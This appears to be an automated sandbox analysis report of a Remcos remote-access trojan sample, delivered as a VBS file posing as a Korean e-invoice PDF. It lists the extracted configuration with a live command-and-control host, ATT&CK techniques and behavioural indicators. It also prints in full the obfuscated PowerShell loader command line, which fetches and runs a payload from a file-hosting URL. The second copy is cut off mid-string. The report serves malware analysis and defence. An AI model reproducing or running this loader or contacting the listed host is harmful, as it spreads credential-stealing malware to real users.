remcos | 26e43271d698c8a1fcc996749109f77b779dd533dc0813513278947db90477b9

Analysis

max time kernel
149s
max time network
137s
platform
windows10-2004_x64
resource
win10v2004-20241007-en
resource tags

arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
submitted
11-11-2024 00:41

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

전자세금계산서·pdf.vbs
Size

86KB
MD5

8b88faca30c1d912d945515b0edce924
SHA1

62d5bee19f043112784832da29a423e1a35cdbae
SHA256

2a3615e8c977f2a9411c9fef294c7dd53986ce084579340b55977544fc94f143
SHA512

be3f1dcdb304cf2e72c9f305cc24c3cb99c6a7579b5d5c69c77f14cdfb12dad82cc3b1ba875d0e94c86cafc740a10a4bfc7eb809c58b9c01ece4dc1fc1e549f9
SSDEEP

1536:R70tt9i0kFFGd9p6puoNyVnJrsI/FBqqOkbSApBknXZ8Y4apgi1VdXaAj2LvbAP:RQL9ihHU9Yu4kn1OEDp6nXZ8YjpTVdus

Score

10^/10

remcos remotehost collection credential_access discovery evasion rat stealer trojan

Malware Config

Extracted

Family

remcos

Botnet

RemoteHost

13hindi4pistatukoy4tra.duckdns.org:47392

Attributes

audio_folder
MicRecords
audio_path
ApplicationPath
audio_record_time
5
connect_delay
0
connect_interval
1
copy_file
remcos.exe
copy_folder
Remcos
delete_file
false
hide_file
false
hide_keylog_file
false
install_flag
false
keylog_crypt
true
keylog_file
logs.dat
keylog_flag
false
keylog_folder
remcos
mouse_option
false
mutex
Rmc-7IIE67
screenshot_crypt
false
screenshot_flag
false
screenshot_folder
Screenshots
screenshot_path
%AppData%
screenshot_time
10
take_screenshot_option
false
take_screenshot_time
5

Signatures

Remcos
Remcos is a closed-source remote control and surveillance software.
rat remcos
Remcos family
remcos

UAC bypass 3 TTPs 1 IoCs

evasion trojan

Bypass User Account Control

T1548.002

Disable or Modify Tools

T1562.001

Modify Registry

T1112

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe

Detected Nirsoft tools 3 IoCs

Free utilities often used by attackers which can steal passwords, product keys, etc.

resource	yara_rule
behavioral2/memory/1920-92-0x0000000000400000-0x0000000000478000-memory.dmp	Nirsoft
behavioral2/memory/512-93-0x0000000000400000-0x0000000000424000-memory.dmp	Nirsoft
behavioral2/memory/1076-91-0x0000000000400000-0x0000000000462000-memory.dmp	Nirsoft

NirSoft MailPassView 1 IoCs

Password recovery tool for various email clients

resource	yara_rule
behavioral2/memory/1076-91-0x0000000000400000-0x0000000000462000-memory.dmp	MailPassView

NirSoft WebBrowserPassView 1 IoCs

Password recovery tool for various web browsers

resource	yara_rule
behavioral2/memory/1920-92-0x0000000000400000-0x0000000000478000-memory.dmp	WebBrowserPassView

Blocklisted process makes network request 13 IoCs

flow	pid	Process
4	2148	WScript.exe
9	1860	powershell.exe
16	1860	powershell.exe
39	2488	msiexec.exe
41	2488	msiexec.exe
43	2488	msiexec.exe
45	2488	msiexec.exe
47	2488	msiexec.exe
49	2488	msiexec.exe
50	2488	msiexec.exe
51	2488	msiexec.exe
52	2488	msiexec.exe
54	2488	msiexec.exe

Uses browser remote debugging 2 TTPs 9 IoCs

Can be used control the browser and steal sensitive information such as credentials and session cookies.

credential_access stealer

Steal Web Session Cookie

T1539

Modify Authentication Process

T1556

pid	Process
1516	msedge.exe
2232	Chrome.exe
1740	Chrome.exe
4592	Chrome.exe
1252	msedge.exe
464	msedge.exe
3452	Chrome.exe
3160	msedge.exe
4776	msedge.exe

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\Control Panel\International\Geo\Nation	WScript.exe

Accesses Microsoft Outlook accounts 1 TTPs 1 IoCs

collection

Email Collection

T1114

description	ioc	Process
Key opened	\REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts	msiexec.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs

Web Service

T1102

flow	ioc
39	drive.google.com
8	drive.google.com
9	drive.google.com

Suspicious use of NtCreateThreadExHideFromDebugger 1 IoCs

pid	Process
2488	msiexec.exe

Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs

pid	Process
4628	powershell.exe
2488	msiexec.exe

Suspicious use of SetThreadContext 3 IoCs

description	pid	Process	procid_target
PID 2488 set thread context of 1920	2488	msiexec.exe	113
PID 2488 set thread context of 1076	2488	msiexec.exe	114
PID 2488 set thread context of 512	2488	msiexec.exe	115

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 7 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	msiexec.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	msiexec.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	msiexec.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	msiexec.exe

System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 2 IoCs

Adversaries may check for Internet connectivity on compromised systems.

discovery

Internet Connection Discovery

T1016.001

pid	Process
1860	powershell.exe
4628	powershell.exe

Enumerates system info in registry 2 TTPs 6 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	Chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	Chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	Chrome.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	msedge.exe

Modifies registry class 1 IoCs

description	ioc	Process
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\	msedge.exe

Modifies registry key 1 TTPs 1 IoCs

Modify Registry

T1112

pid	Process
3564	reg.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
1860	powershell.exe
1860	powershell.exe
4628	powershell.exe
4628	powershell.exe
4628	powershell.exe
2488	msiexec.exe
2488	msiexec.exe
2488	msiexec.exe
2488	msiexec.exe
2488	msiexec.exe
2488	msiexec.exe
2488	msiexec.exe
2488	msiexec.exe
2488	msiexec.exe
2488	msiexec.exe
2488	msiexec.exe
2488	msiexec.exe
2488	msiexec.exe
2488	msiexec.exe
1920	msiexec.exe
1920	msiexec.exe
2488	msiexec.exe
2488	msiexec.exe
512	msiexec.exe
512	msiexec.exe
2488	msiexec.exe
2488	msiexec.exe
2488	msiexec.exe
2488	msiexec.exe
2488	msiexec.exe
2488	msiexec.exe
2488	msiexec.exe
2488	msiexec.exe
2488	msiexec.exe
2488	msiexec.exe
2488	msiexec.exe
2488	msiexec.exe
2488	msiexec.exe
2488	msiexec.exe
2488	msiexec.exe
2488	msiexec.exe
1920	msiexec.exe
1920	msiexec.exe
2488	msiexec.exe
2488	msiexec.exe
2488	msiexec.exe
2488	msiexec.exe
2488	msiexec.exe
2488	msiexec.exe
2232	Chrome.exe
2232	Chrome.exe
2488	msiexec.exe
2488	msiexec.exe
2488	msiexec.exe
2488	msiexec.exe
2488	msiexec.exe
2488	msiexec.exe
2488	msiexec.exe
2488	msiexec.exe
2488	msiexec.exe
2488	msiexec.exe
2488	msiexec.exe
2488	msiexec.exe
2488	msiexec.exe

Suspicious behavior: MapViewOfSection 4 IoCs

pid	Process
4628	powershell.exe
2488	msiexec.exe
2488	msiexec.exe
2488	msiexec.exe

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 4 IoCs

pid	Process
3160	msedge.exe
3160	msedge.exe
3160	msedge.exe
3160	msedge.exe

Suspicious use of AdjustPrivilegeToken 19 IoCs

description	pid	Process
Token: SeDebugPrivilege	1860	powershell.exe
Token: SeDebugPrivilege	4628	powershell.exe
Token: SeDebugPrivilege	512	msiexec.exe
Token: SeShutdownPrivilege	2232	Chrome.exe
Token: SeCreatePagefilePrivilege	2232	Chrome.exe
Token: SeShutdownPrivilege	2232	Chrome.exe
Token: SeCreatePagefilePrivilege	2232	Chrome.exe
Token: SeShutdownPrivilege	2232	Chrome.exe
Token: SeCreatePagefilePrivilege	2232	Chrome.exe
Token: SeShutdownPrivilege	2232	Chrome.exe
Token: SeCreatePagefilePrivilege	2232	Chrome.exe
Token: SeShutdownPrivilege	2232	Chrome.exe
Token: SeCreatePagefilePrivilege	2232	Chrome.exe
Token: SeShutdownPrivilege	2232	Chrome.exe
Token: SeCreatePagefilePrivilege	2232	Chrome.exe
Token: SeShutdownPrivilege	2232	Chrome.exe
Token: SeCreatePagefilePrivilege	2232	Chrome.exe
Token: SeShutdownPrivilege	2232	Chrome.exe
Token: SeCreatePagefilePrivilege	2232	Chrome.exe

Suspicious use of FindShellTrayWindow 4 IoCs

pid	Process
2232	Chrome.exe
3160	msedge.exe
3160	msedge.exe
3160	msedge.exe

Suspicious use of SetWindowsHookEx 1 IoCs

pid	Process
2488	msiexec.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 2148 wrote to memory of 1860	2148	WScript.exe	85
PID 2148 wrote to memory of 1860	2148	WScript.exe	85
PID 4628 wrote to memory of 2488	4628	powershell.exe	105
PID 4628 wrote to memory of 2488	4628	powershell.exe	105
PID 4628 wrote to memory of 2488	4628	powershell.exe	105
PID 4628 wrote to memory of 2488	4628	powershell.exe	105
PID 2488 wrote to memory of 696	2488	msiexec.exe	108
PID 2488 wrote to memory of 696	2488	msiexec.exe	108
PID 2488 wrote to memory of 696	2488	msiexec.exe	108
PID 696 wrote to memory of 3564	696	cmd.exe	110
PID 696 wrote to memory of 3564	696	cmd.exe	110
PID 696 wrote to memory of 3564	696	cmd.exe	110
PID 2488 wrote to memory of 2232	2488	msiexec.exe	111
PID 2488 wrote to memory of 2232	2488	msiexec.exe	111
PID 2232 wrote to memory of 3632	2232	Chrome.exe	112
PID 2232 wrote to memory of 3632	2232	Chrome.exe	112
PID 2488 wrote to memory of 1920	2488	msiexec.exe	113
PID 2488 wrote to memory of 1920	2488	msiexec.exe	113
PID 2488 wrote to memory of 1920	2488	msiexec.exe	113
PID 2488 wrote to memory of 1920	2488	msiexec.exe	113
PID 2488 wrote to memory of 1076	2488	msiexec.exe	114
PID 2488 wrote to memory of 1076	2488	msiexec.exe	114
PID 2488 wrote to memory of 1076	2488	msiexec.exe	114
PID 2488 wrote to memory of 1076	2488	msiexec.exe	114
PID 2488 wrote to memory of 512	2488	msiexec.exe	115
PID 2488 wrote to memory of 512	2488	msiexec.exe	115
PID 2488 wrote to memory of 512	2488	msiexec.exe	115
PID 2488 wrote to memory of 512	2488	msiexec.exe	115
PID 2232 wrote to memory of 2736	2232	Chrome.exe	117
PID 2232 wrote to memory of 2736	2232	Chrome.exe	117
PID 2232 wrote to memory of 2736	2232	Chrome.exe	117
PID 2232 wrote to memory of 2736	2232	Chrome.exe	117
PID 2232 wrote to memory of 2736	2232	Chrome.exe	117
PID 2232 wrote to memory of 2736	2232	Chrome.exe	117
PID 2232 wrote to memory of 2736	2232	Chrome.exe	117
PID 2232 wrote to memory of 2736	2232	Chrome.exe	117
PID 2232 wrote to memory of 2736	2232	Chrome.exe	117
PID 2232 wrote to memory of 2736	2232	Chrome.exe	117
PID 2232 wrote to memory of 2736	2232	Chrome.exe	117
PID 2232 wrote to memory of 2736	2232	Chrome.exe	117
PID 2232 wrote to memory of 2736	2232	Chrome.exe	117
PID 2232 wrote to memory of 2736	2232	Chrome.exe	117
PID 2232 wrote to memory of 2736	2232	Chrome.exe	117
PID 2232 wrote to memory of 2736	2232	Chrome.exe	117
PID 2232 wrote to memory of 2736	2232	Chrome.exe	117
PID 2232 wrote to memory of 2736	2232	Chrome.exe	117
PID 2232 wrote to memory of 2736	2232	Chrome.exe	117
PID 2232 wrote to memory of 2736	2232	Chrome.exe	117
PID 2232 wrote to memory of 2736	2232	Chrome.exe	117
PID 2232 wrote to memory of 2736	2232	Chrome.exe	117
PID 2232 wrote to memory of 2736	2232	Chrome.exe	117
PID 2232 wrote to memory of 2736	2232	Chrome.exe	117
PID 2232 wrote to memory of 2736	2232	Chrome.exe	117
PID 2232 wrote to memory of 2736	2232	Chrome.exe	117
PID 2232 wrote to memory of 2736	2232	Chrome.exe	117
PID 2232 wrote to memory of 2736	2232	Chrome.exe	117
PID 2232 wrote to memory of 2736	2232	Chrome.exe	117
PID 2232 wrote to memory of 2736	2232	Chrome.exe	117
PID 2232 wrote to memory of 2236	2232	Chrome.exe	118
PID 2232 wrote to memory of 2236	2232	Chrome.exe	118
PID 2232 wrote to memory of 4836	2232	Chrome.exe	119
PID 2232 wrote to memory of 4836	2232	Chrome.exe	119
PID 2232 wrote to memory of 4836	2232	Chrome.exe	119
PID 2232 wrote to memory of 4836	2232	Chrome.exe	119

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\전자세금계산서·pdf.vbs"
1⤵
- Blocklisted process makes network request
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:2148
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "<#Undiscriminatingness Vodun Hervards Folkefrontsregeringen Carmakers #><#Polyhedrons Versionsnavnenes Baalets Quadrennially Catarines Recondite #>$Disleaf100='Mrtel';function Moderates7($Trdestens){If ($host.DebuggerEnabled) {$Flood++;$effectualnesses=$Trdestens.'Length' - $Flood} for ( $Foelelsen=4;$Foelelsen -lt $effectualnesses;$Foelelsen+=5){$Brillanters151=$Foelelsen;$Sippingly+=$Trdestens[$Foelelsen]}$Sippingly}function forsrgelseskommunernes($Primrfilers){ .($Modkandidaten) ($Primrfilers)}$Lossen=Moderates7 'Forgn KnoeGe,vtBist.Jeh w Vs.EEndybUnsecAlkol,eroIAspieSandn Re.Tco n ';$Splanchnopleure=Moderates7 'Kl.tM iaoK.gezTugti ClelFormlPrewaBac /Redi ';$flintres=Moderates7 ' sogTOrgalSupesColp1Unus2 ryn ';$Kliniskes='Mail[Rac,NGluce SquTOmsi.StresParneBasiR L mv kerIHe,sC Ko etwelPUnesOCe tiR giNPolyT amuMa,baASashng teAGenfG AirEAngrr ent]B ug: Ryk:,eenSDogseMar,cBet.U olsROm yI rigTPyrrYFl.nPclavr Couo FortMedio beecCharoSp oL ,ev=stud$OpspfBioglTummi ormN Sn.TParlrUlykeOf dSMoze ';$Splanchnopleure+=Moderates7 ' aje5Cas .fors0Skar T sk( imiW,okuiOrddnDo.adsteroAy twF,apsNu z V,nNchroTErob rot 1Cens0Type.Prod0Hove;Te r SensW nci Keln B.a6 Rec4Fakt;Dile MichxUdfo6Gyld4Klor;Exhu UnmrRentvtext: es1 Ill3Eret1aper.None0Reve) Ant Cu.GProgeP rocpalikRn,eo Hai/ .ap2,ede0 Ful1E,in0 Bu 0cata1Ud,l0,ovn1Li.p RevoFP.ntiSalgrTurbeSl gfakt o A txf ls/ Pec1N vl3De.e1Len .Nic 0Dipl ';$Umodenhedens246=Moderates7 'Ss.euLuneSMultEA roRComi-DkssAPadagSymmEPl tNSolltSted ';$Tallit=Moderates7 'R.buhPondtGud tThurpImpusAfse:Chid/anas/kr,pdDobbrTruci Cr,v Plue eng.Uds,gTayioTradoel kgImmalS.gne ush.Leibc SkroBorrmAn i/SquauBru,c.ors?PerreI loxNonspPreso Omsr ventQuod=PluvdSulpo BlewDiscnarenlNeuro Disa MoldImpr&Ph,sibungd kor=Karr1Siph1kejs6EsopG tepeBortVKlipSBeelxO tjaforu7StarC tifmMelo0 .esvFlorf M,lwMu.r2 Up zOve t EnapT,fnBEquimsaggqTa aL Bie8DialUVariy Me,A,orsNPancdC muA ap_Topao eal ';$Udfrselsforbuddets=Moderates7 'Quar>,yan ';$Modkandidaten=Moderates7 ' MidiGua EFes xDo e ';$Par='Problemfrit';$Skridfastes='\Banebryderes.Non';forsrgelseskommunernes (Moderates7 '.den$F kagLogalPagiOTem bF,miA arLP,is: Faxe C,nsRej rBeg o CurgS,egsEndo= ymn$Mas eKnleNCracV Cli:Le.saSkaaP Medp irsdN.npA Inft ho aBism+T mm$TranSWaivKMlkeREkspIRecrdUdprFOverARi oSUdbyT soEGropsFil ');forsrgelseskommunernes (Moderates7 'Andr$SeveGSkurlMks.O nsBFordAA baLCe.s:TidsCs enrPersoSammTKli aPirqp rimhEnthI Gauo RednBrnd=Efte$FisstTrinAVeinLE taLProtiHereT Per.DobbSS,eaP atal C,eIHypoTFras(Til.$U inuUnmuD ameF uborUvejSUroceHalel MooSDsleFPar,OH.ikRtopfbBogpu heDRaadD FriELapaT orss Dat)S,ot ');forsrgelseskommunernes (Moderates7 $Kliniskes);$Tallit=$Crotaphion[0];$Mytologiers=(Moderates7 'Preg$FodngIndklBlodoOpd,B alaDesslWarm:di essvmmITeleLKarrjRe mAHankSPort=CellNSkrieFadeW K,i-,lado D bB ArbJAsice CatCd,rmTHngt .ncrSVareyReacs E stUskaenutiMM lo. Art$ TriLFatto zygsGlauSpatcE ropnOv r ');forsrgelseskommunernes ($Mytologiers);forsrgelseskommunernes (Moderates7 'halv$UnfoSForriWooll refjKajaaA unsLigh.Cou.H ngeeVandaOu.tdT lbe afrr,allsdest[,epa$,ntaUI,gem TjroHidsdLarmeCycanAfbrhUvaneRoerd Do eFa.tnA,tisUsmm2 Fal4Resr6 Fe,] Eng=Bear$SkadS KetpAutolR,baa RepnTro csarahEpocn,agso wepOrdelskileAno upla r ndeFdre ');$Rumpadder=Moderates7 'Radi$SessSbi ti S,nlU etjfro a OopsUdfr.Unw DR ugoAutow azan koblscraoSpidaMaa dJarvFPoesiS bslTaveePros(Soci$,ourTForea Fril R nlThioi SubtRefu,To p$EutyV alvaBasnmSupesUrok)Goat ';$Vams=$Esrogs;forsrgelseskommunernes (Moderates7 'Flas$Photg,ontlAlimoDanuBHonnaZ ielLa d:SkrapInp R StrIOystoVo,eR BrniIgant.eriemazaT Ales udsRStryk Pyck ase draf NaiLVindG.ncoeUnde=C ma(DesatLi rE RedsEksptDege-F empCirkamangtVernhLekt Busf$skriVSladaPeccM.ortsMeso)Tils ');while (!$Prioritetsrkkeflge) {forsrgelseskommunernes (Moderates7 'Reri$TaargBanelMi toindpb F mareselTerm:YusdMMoraaFinapKlerpC.pteBillrEcho=Post$BrnetEmmer.lagu Drie rei ') ;forsrgelseskommunernes $Rumpadder;forsrgelseskommunernes (Moderates7 'BromsRespTVelsaTierRSta tStre- MovSInteLArcheKuldeundfp.qui Gran4Disa ');forsrgelseskommunernes (Moderates7 'Numm$UnreG AsmLOutsoM ltb lumA.ellL.ale: A sPLiftrOrnai irco ThaR,mbriFerrTSha eMeddtNonlsobskRF euKAn rKHandEKol,f IntL P.pg.ynfe,rab=Pist(Hus,tsys.e mansStjkTEksp- alpNataAOptoTModeHTord Anf$SupeV.ndka AntMOvers Jv.)Pann ') ;forsrgelseskommunernes (Moderates7 'sw n$SexgGAposLLideOEl ebunpeANonsLSita:MispR DrueSalvPTil EInderPhotKSe i= Lud$GromgG rnlElatO TriBTheoaMillL Exu:P ela Hetu allGUkbuUjoggSLizetAssuSAcetNCha D iera Ma,gBnkh+ko p+Tere%Pree$ lsdC FhorIsomoPerit BreaForeP GreHKoloiMicro lgtNGasa.Ret C ropoPounuMalmnAlumtNons ') ;$Tallit=$Crotaphion[$Reperk]}$poncho=321965;$Yawn=30428;forsrgelseskommunernes (Moderates7 'Elfo$Stefg UnbLCiliO C eBverdA DatLmela:PlejNAffueEnemPiridHhrecrIrr e DefCinditRoduAForeSSneaIEvapa Ye Chac=Proe BakuGS,iceTvist dr-meascBassORa iN.leuT Ture Tann JerTnrin yd r$S.ndVStruA yrmS.lss us ');forsrgelseskommunernes (Moderates7 'Udeb$ForbgCheel.enaoBirrbFor a.bdulHvil:DokuEMulmx KamsFolkeChokrRevitReunsHjfo Con =Bekl Ha.i[ InjSApriySirpsS lhtIndde Form Akk.BippC OveoFljdnarguvCu ue.nuer ToptMisp] Sot:Serv:BaadFKenirShunoIn emG,veB,eroaPasssAn.meCann6 len4InanSA oxtArcurGi tiOutlnAfragU de( Att$OogeNfugueVanlpUns,hRonirAn.ueAp rcRaditElekaTusksSpitiForvabegr)Bane ');forsrgelseskommunernes (Moderates7 'Vaga$ onGProclParaOUre BSilvaVestlPapi: S.rsDe omO,snAInamaZ naFK,nseInefj,ugsLMerssDoor Camo= Mon Str[Fa,ssRtehyEkspsDelttrecieFladMForb.ArbeTBezoE,vigX VdeT Chi.BeefECinnN roccBeskoFormd,rumiIn oNL anGBu l]Pare:bygn:MongA P fsPyraCOpbliCin.IBema.Ome gHinge GenT UdvsHumrtInfarVil ITilhNUsliGF,tt(Macr$D,ueE Lo xPhocs leENonerar.et.eleSMell)Afs ');forsrgelseskommunernes (Moderates7 'Rusl$syl GDerfl aphOQuasbB.spABundlF it:Te.bot ktP KomPBeleIGr,yGJapaN ImpoLemaRsid a V.dT,oveESpio=Me e$FabrsAbelmHyd AR dhAStilf Ov eF,reJSyndL finS T v.PaspSSkyhusig BRecosTlpetBl dRc uniSangn NonG Cha(Lill$trosPR.maOStyln.ericO,sth,nfrO al.,Geog$Skn.YTvrfaRuggwNewsnToha) onc ');forsrgelseskommunernes $Oppignorate;"
  2⤵
  - Blocklisted process makes network request
  - System Network Configuration Discovery: Internet Connection Discovery
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:1860

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" "<#Undiscriminatingness Vodun Hervards Folkefrontsregeringen Carmakers #><#Polyhedrons Versionsnavnenes Baalets Quadrennially Catarines Recondite #>$Disleaf100='Mrtel';function Moderates7($Trdestens){If ($host.DebuggerEnabled) {$Flood++;$effectualnesses=$Trdestens.'Length' - $Flood} for ( $Foelelsen=4;$Foelelsen -lt $effectualnesses;$Foelelsen+=5){$Brillanters151=$Foelelsen;$Sippingly+=$Trdestens[$Foelelsen]}$Sippingly}function forsrgelseskommunernes($Primrfilers){ .($Modkandidaten) ($Primrfilers)}$Lossen=Moderates7 'Forgn KnoeGe,vtBist.Jeh w Vs.EEndybUnsecAlkol,eroIAspieSandn Re.Tco n ';$Splanchnopleure=Moderates7 'Kl.tM iaoK.gezTugti ClelFormlPrewaBac /Redi ';$flintres=Moderates7 ' sogTOrgalSupesColp1Unus2 ryn ';$Kliniskes='Mail[Rac,NGluce SquTOmsi.StresParneBasiR L mv kerIHe,sC Ko etwelPUnesOCe tiR giNPolyT amuMa,baASashng teAGenfG AirEAngrr ent]B ug: Ryk:,eenSDogseMar,cBet.U olsROm yI rigTPyrrYFl.nPclavr Couo FortMedio beecCharoSp oL ,ev=stud$OpspfBioglTummi ormN Sn.TParlrUlykeOf dSMoze ';$Splanchnopleure+=Moderates7 ' aje5Cas .fors0Skar T sk( imiW,okuiOrddnDo.adsteroAy twF,apsNu z V,nNchroTErob rot 1Cens0Type.Prod0Hove;Te r SensW nci Keln B.a6 Rec4Fakt;Dile MichxUdfo6Gyld4Klor;Exhu UnmrRentvtext: es1 Ill3Eret1aper.None0Reve) Ant Cu.GProgeP rocpalikRn,eo Hai/ .ap2,ede0 Ful1E,in0 Bu 0cata1Ud,l0,ovn1Li.p RevoFP.ntiSalgrTurbeSl gfakt o A txf ls/ Pec1N vl3De.e1Len .Nic 0Dipl ';$Umodenhedens246=Moderates7 'Ss.euLuneSMultEA roRComi-DkssAPadagSymmEPl tNSolltSted ';$Tallit=Moderates7 'R.buhPondtGud tThurpImpusAfse:Chid/anas/kr,pdDobbrTruci Cr,v Plue eng.Uds,gTayioTradoel kgImmalS.gne ush.Leibc SkroBorrmAn i/SquauBru,c.ors?PerreI loxNonspPreso Omsr ventQuod=PluvdSulpo BlewDiscnarenlNeuro Disa MoldImpr&Ph,sibungd kor=Karr1Siph1kejs6EsopG tepeBortVKlipSBeelxO tjaforu7StarC tifmMelo0 .esvFlorf M,lwMu.r2 Up zOve t EnapT,fnBEquimsaggqTa aL Bie8DialUVariy Me,A,orsNPancdC muA ap_Topao eal ';$Udfrselsforbuddets=Moderates7 'Quar>,yan ';$Modkandidaten=Moderates7 ' MidiGua EFes xDo e ';$Par='Problemfrit';$Skridfastes='\Banebryderes.Non';forsrgelseskommunernes (Moderates7 '.den$F kagLogalPagiOTem bF,miA arLP,is: Faxe C,nsRej rBeg o CurgS,egsEndo= ymn$Mas eKnleNCracV Cli:Le.saSkaaP Medp irsdN.npA Inft ho aBism+T mm$TranSWaivKMlkeREkspIRecrdUdprFOverARi oSUdbyT soEGropsFil ');forsrgelseskommunernes (Moderates7 'Andr$SeveGSkurlMks.O nsBFordAA baLCe.s:TidsCs enrPersoSammTKli aPirqp rimhEnthI Gauo RednBrnd=Efte$FisstTrinAVeinLE taLProtiHereT Per.DobbSS,eaP atal C,eIHypoTFras(Til.$U inuUnmuD ameF uborUvejSUroceHalel MooSDsleFPar,OH.ikRtopfbBogpu heDRaadD FriELapaT orss Dat)S,ot ');forsrgelseskommunernes (Moderates7 $Kliniskes);$Tallit=$Crotaphion[0];$Mytologiers=(Moderates7 'Preg$FodngIndklBlodoOpd,B alaDesslWarm:di essvmmITeleLKarrjRe mAHankSPort=CellNSkrieFadeW K,i-,lado D bB ArbJAsice CatCd,rmTHngt .ncrSVareyReacs E stUskaenutiMM lo. Art$ TriLFatto zygsGlauSpatcE ropnOv r ');forsrgelseskommunernes ($Mytologiers);forsrgelseskommunernes (Moderates7 'halv$UnfoSForriWooll refjKajaaA unsLigh.Cou.H ngeeVandaOu.tdT lbe afrr,allsdest[,epa$,ntaUI,gem TjroHidsdLarmeCycanAfbrhUvaneRoerd Do eFa.tnA,tisUsmm2 Fal4Resr6 Fe,] Eng=Bear$SkadS KetpAutolR,baa RepnTro csarahEpocn,agso wepOrdelskileAno upla r ndeFdre ');$Rumpadder=Moderates7 'Radi$SessSbi ti S,nlU etjfro a OopsUdfr.Unw DR ugoAutow azan koblscraoSpidaMaa dJarvFPoesiS bslTaveePros(Soci$,ourTForea Fril R nlThioi SubtRefu,To p$EutyV alvaBasnmSupesUrok)Goat ';$Vams=$Esrogs;forsrgelseskommunernes (Moderates7 'Flas$Photg,ontlAlimoDanuBHonnaZ ielLa d:SkrapInp R StrIOystoVo,eR BrniIgant.eriemazaT Ales udsRStryk Pyck ase draf NaiLVindG.ncoeUnde=C ma(DesatLi rE RedsEksptDege-F empCirkamangtVernhLekt Busf$skriVSladaPeccM.ortsMeso)Tils ');while (!$Prioritetsrkkeflge) {forsrgelseskommunernes (Moderates7 'Reri$TaargBanelMi toindpb F mareselTerm:YusdMMoraaFinapKlerpC.pteBillrEcho=Post$BrnetEmmer.lagu Drie rei ') ;forsrgelseskommunernes $Rumpadder;forsrgelseskommunernes (Moderates7 'BromsRespTVelsaTierRSta tStre- MovSInteLArcheKuldeundfp.qui Gran4Disa ');forsrgelseskommunernes (Moderates7 'Numm$UnreG AsmLOutsoM ltb lumA.ellL.ale: A sPLiftrOrnai irco ThaR,mbriFerrTSha eMeddtNonlsobskRF euKAn rKHandEKol,f IntL P.pg.ynfe,rab=Pist(Hus,tsys.e mansStjkTEksp- alpNataAOptoTModeHTord Anf$SupeV.ndka AntMOvers Jv.)Pann ') ;forsrgelseskommunernes (Moderates7 'sw n$SexgGAposLLideOEl ebunpeANonsLSita:MispR DrueSalvPTil EInderPhotKSe i= Lud$GromgG rnlElatO TriBTheoaMillL Exu:P ela Hetu allGUkbuUjoggSLizetAssuSAcetNCha D iera Ma,gBnkh+ko p+Tere%Pree$ lsdC FhorIsomoPerit BreaForeP GreHKoloiMicro lgtNGasa.Ret C ropoPounuMalmnAlumtNons ') ;$Tallit=$Crotaphion[$Reperk]}$poncho=321965;$Yawn=30428;forsrgelseskommunernes (Moderates7 'Elfo$Stefg UnbLCiliO C eBverdA DatLmela:PlejNAffueEnemPiridHhrecrIrr e DefCinditRoduAForeSSneaIEvapa Ye Chac=Proe BakuGS,iceTvist dr-meascBassORa iN.leuT Ture Tann JerTnrin yd r$S.ndVStruA yrmS.lss us ');forsrgelseskommunernes (Moderates7 'Udeb$ForbgCheel.enaoBirrbFor a.bdulHvil:DokuEMulmx KamsFolkeChokrRevitReunsHjfo Con =Bekl Ha.i[ InjSApriySirpsS lhtIndde Form Akk.BippC OveoFljdnarguvCu ue.nuer ToptMisp] Sot:Serv:BaadFKenirShunoIn emG,veB,eroaPasssAn.meCann6 len4InanSA oxtArcurGi tiOutlnAfragU de( Att$OogeNfugueVanlpUns,hRonirAn.ueAp 